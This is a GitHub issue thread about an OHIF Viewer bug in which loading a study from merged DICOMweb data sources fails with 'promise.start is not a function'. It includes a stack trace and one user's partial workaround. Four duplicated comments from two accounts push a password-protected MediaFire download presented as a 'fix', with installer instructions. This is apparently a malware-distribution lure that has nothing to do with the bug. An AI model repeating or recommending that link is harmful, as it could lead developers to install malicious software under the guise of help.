### ISSUE TITLE
[Bug] promise.start() is not a function when using merged dataSources

### ISSUE THREAD

**Issue by josue-venegas-almonacid** [OHIF/Viewers#4349]
### Describe the Bug

Using two [merged dataSources](https://docs.ohif.org/platform/extensions/modules/data-source/#merge-data-source), if you try to enter a study, it returns the error "promise.start() is not a function".

### Steps to Reproduce

1. Using OHIF 3.7.0, merge two dicomweb dataSources (in my case, 2 orthanc instances) [(check OHIF's doc)](https://docs.ohif.org/platform/extensions/modules/data-source/#merge-data-source)
2. Upload some modalities to the first server and the rest modalities from the same study to the second server, so you will have the same study in both servers (in my case, CT+RT STRUCT+RT DOSE to the first server and RT PLAN to the second server)
3. Open OHIF and try to enter to that study

### The current behavior

OHIF gets stuck trying to load the study, and the following error is displayed in the console:

```
Uncaught (in promise) TypeError: promise.start is not a function
    at app.js:19054:78
    at Array.map (<anonymous>)
    at app.js:19054:55
    at Array.forEach (<anonymous>)
    at app.js:19039:14
    at async defaultRouteInit (app.js:19029:3)
```

### The expected behavior

To load the selected study

### OS

Fedora Workstation 40

### Node version

20.12.2

### Browser

Chrome v127.0.6533.119

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by elazarcoh** [comment]
I think the issues is that `defaultRouteInit.ts` is not taking into account the "merged data-source" case. Not sure whether it should. Maybe the merged need to return a "promise of array of promises" instead of an "array of promises", so that `defaultRouteInit.ts` will handle it correctly. 

I don't want to spend time on fixing it correctly, so I'm working around it like this:
![image](https://github.com/user-attachments/assets/593fe4d6-f173-4dde-ba80-62e6b48c780b)

I'll see if my workaround causes other troubles, but I don't except that it would.

**Comment by sedghi** [comment]
Did you guys fix this ever?
